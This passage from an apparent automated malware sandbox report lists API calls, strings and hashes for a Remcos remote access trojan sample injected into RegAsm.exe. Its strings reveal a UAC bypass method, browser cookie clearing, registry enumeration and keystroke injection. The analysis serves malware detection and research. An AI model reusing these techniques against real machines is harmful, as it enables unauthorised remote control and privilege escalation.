                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Console$Window$AllocOutputShow
                                                • String ID: Remcos v$5.1.1 Pro$CONOUT$
                                                • API String ID: 4067487056-3820604032
                                                • Opcode ID: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                • Instruction ID: 6efa3de70d430de9448838496adf33c47162c0890a3ad1875f095e209401f165
                                                • Opcode Fuzzy Hash: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                • Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
                                                APIs
                                                • SendInput.USER32 ref: 00419A25
                                                • SendInput.USER32(00000001,?,0000001C), ref: 00419A4D
                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                                • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                                  • Part of subcall function 004199CE: MapVirtualKeyA.USER32 ref: 004199D4
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InputSend$Virtual
                                                • String ID:
                                                • API String ID: 1167301434-0
                                                • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                                • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __freea$__alloca_probe_16_free
                                                • String ID: a/p$am/pm$h{D
                                                • API String ID: 2936374016-2303565833
                                                • Opcode ID: fd6751c856b69d551333f65899c140b2c90fb7d01a30c867c2f4d7dd71cdc8bb
                                                • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                                • Opcode Fuzzy Hash: fd6751c856b69d551333f65899c140b2c90fb7d01a30c867c2f4d7dd71cdc8bb
                                                • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                                APIs
                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                • _free.LIBCMT ref: 00444E87
                                                • _free.LIBCMT ref: 00444E9E
                                                • _free.LIBCMT ref: 00444EBD
                                                • _free.LIBCMT ref: 00444ED8
                                                • _free.LIBCMT ref: 00444EEF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$AllocateHeap
                                                • String ID: KED
                                                • API String ID: 3033488037-2133951994
                                                • Opcode ID: bf8f09c86d4ddf62a61791e98d41f8d125843f3e4b01e4d539fef815b17f4b11
                                                • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                                • Opcode Fuzzy Hash: bf8f09c86d4ddf62a61791e98d41f8d125843f3e4b01e4d539fef815b17f4b11
                                                • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                                APIs
                                                • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                                                • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710), ref: 00413BC6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Enum$InfoQueryValue
                                                • String ID: [regsplt]$xUG$TG
                                                • API String ID: 3554306468-1165877943
                                                • Opcode ID: 4b0e642b2c48494caa08e7f7a3ba59522f0f548a4503128eeb0998b2f931d829
                                                • Instruction ID: 25111a67c66830bda9a991cbd11294aa9b1843c944dfd5f4caafe5fa1545c2ae
                                                • Opcode Fuzzy Hash: 4b0e642b2c48494caa08e7f7a3ba59522f0f548a4503128eeb0998b2f931d829
                                                • Instruction Fuzzy Hash: 05512D71900219AADB11EB95DC86EEEB77DAF04305F10007AE505B6191EF746B48CBA9
                                                APIs
                                                • GetConsoleCP.KERNEL32 ref: 100094D4
                                                • __fassign.LIBCMT ref: 1000954F
                                                • __fassign.LIBCMT ref: 1000956A
                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000), ref: 100095AF
                                                • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000), ref: 100095E8
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                • String ID:
                                                • API String ID: 1324828854-0
                                                • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                                APIs
                                                • GetConsoleCP.KERNEL32 ref: 0044B47E
                                                • __fassign.LIBCMT ref: 0044B4F9
                                                • __fassign.LIBCMT ref: 0044B514
                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                                • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000), ref: 0044B559
                                                • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000), ref: 0044B592
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                • String ID:
                                                • API String ID: 1324828854-0
                                                • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                                                • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                                APIs
                                                • RegOpenKeyExW.ADVAPI32 ref: 00413D81
                                                  • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                  • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                • RegCloseKey.ADVAPI32(00000000), ref: 00413EEF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumInfoOpenQuerysend
                                                • String ID: xUG$NG$NG$TG
                                                • API String ID: 3114080316-2811732169
                                                • Opcode ID: b671a3d148dc4dad6e50aea19cc29b45d172fff4de9eef1f9094f07207dc39cd
                                                • Instruction ID: 39136fa66a1b3d14a29046baa0c8a2124f92290552efa608aac098e6c3039c27
                                                • Opcode Fuzzy Hash: b671a3d148dc4dad6e50aea19cc29b45d172fff4de9eef1f9094f07207dc39cd
                                                • Instruction Fuzzy Hash: 03419F316042005AC324F726D852AEF76A99FD1384F40883FF549671D2EF7C5949866E
                                                APIs
                                                • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                • String ID: csm
                                                • API String ID: 1170836740-1018135373
                                                • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                                APIs
                                                  • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32 ref: 00413678
                                                  • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                  • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                  • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                  • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                • _wcslen.LIBCMT ref: 0041B7F4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                                • API String ID: 3286818993-122982132
                                                • Opcode ID: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                                • Opcode Fuzzy Hash: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                                APIs
                                                  • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                  • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
                                                  • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                                • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                • API String ID: 1133728706-4073444585
                                                • Opcode ID: c07787becfdd919c069db1a68e32e5c9d5958318cedaa5e6beefbf099ad8eae3
                                                • Instruction ID: a06d8339010b4a31413dea3cf8b7af81beee50618fccc2c871009a62ab4f9f33
                                                • Opcode Fuzzy Hash: c07787becfdd919c069db1a68e32e5c9d5958318cedaa5e6beefbf099ad8eae3
                                                • Instruction Fuzzy Hash: BC215230A40219A6CB14F7F1CC969EE77299F50744F80017FE502B71D1EB7D6945C6DA
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4464324db8c5353dfe5ce51150f621231adbafcb5ed67c6bb2f14fac2072150c
                                                • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                                • Opcode Fuzzy Hash: 4464324db8c5353dfe5ce51150f621231adbafcb5ed67c6bb2f14fac2072150c
                                                • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                                APIs
                                                • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C4DE
                                                • CloseHandle.KERNEL32(00000000), ref: 0041C4EA
                                                • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4FB
                                                • CloseHandle.KERNEL32(00000000), ref: 0041C508
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$CloseHandle$CreatePointerWrite
                                                • String ID: xpF
                                                • API String ID: 1852769593-354647465
                                                • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                                • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639
                                                APIs
                                                  • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                • _free.LIBCMT ref: 100092AB
                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                • _free.LIBCMT ref: 100092B6
                                                • _free.LIBCMT ref: 100092C1
                                                • _free.LIBCMT ref: 10009315
                                                • _free.LIBCMT ref: 10009320
                                                • _free.LIBCMT ref: 1000932B
                                                • _free.LIBCMT ref: 10009336
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                                APIs
                                                  • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                                • _free.LIBCMT ref: 00450FC8
                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                • _free.LIBCMT ref: 00450FD3
                                                • _free.LIBCMT ref: 00450FDE
                                                • _free.LIBCMT ref: 00451032
                                                • _free.LIBCMT ref: 0045103D
                                                • _free.LIBCMT ref: 00451048
                                                • _free.LIBCMT ref: 00451053
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                                • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                                • int.LIBCPMT ref: 004111BE
                                                  • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                  • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                • std::_Facet_Register.LIBCPMT ref: 004111FE
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                • String ID: (mG
                                                • API String ID: 2536120697-4059303827
                                                • Opcode ID: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                • Instruction ID: b4facbf35e110c19f3eede998f69f9310dce987b63f856d60fe44c7d5fb17b17
                                                • Opcode Fuzzy Hash: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                • Instruction Fuzzy Hash: 42112732900114A7CB14EB9AD8018DEB7699F44364F11456FF904F72E1DB789E45CBC8
                                                APIs
                                                • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                                • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLastValue___vcrt_
                                                • String ID:
                                                • API String ID: 3852720340-0
                                                • Opcode ID: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                                • Opcode Fuzzy Hash: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                                APIs
                                                • CoInitializeEx.OLE32(00000000,00000002), ref: 0040760B
                                                  • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                                  • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                • CoUninitialize.OLE32 ref: 00407664
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InitializeObjectUninitialize_wcslen
                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                • API String ID: 3851391207-1839356972
                                                • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                                • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                                APIs
                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                                • GetLastError.KERNEL32 ref: 0040BB22
                                                Strings
                                                • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                                • [Chrome Cookies not found], xrefs: 0040BB3C
                                                • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                                • UserProfile, xrefs: 0040BAE8
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DeleteErrorFileLast
                                                • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                • API String ID: 2018770650-304995407
                                                • Opcode ID: e57bb7af6ede7258cae938a4b9e303b9ad2d55d8c8bd3889b57b796562934694
                                                • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                                • Opcode Fuzzy Hash: e57bb7af6ede7258cae938a4b9e303b9ad2d55d8c8bd3889b57b796562934694
                                                • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE

APIs
• __allrem.LIBCMT ref: 0043ACE9
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
• __allrem.LIBCMT ref: 0043AD1C
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
• __allrem.LIBCMT ref: 0043AD51
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
Memory Dump Source
• Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
• String ID:
• API String ID: 1992179935-0
• Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
• Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
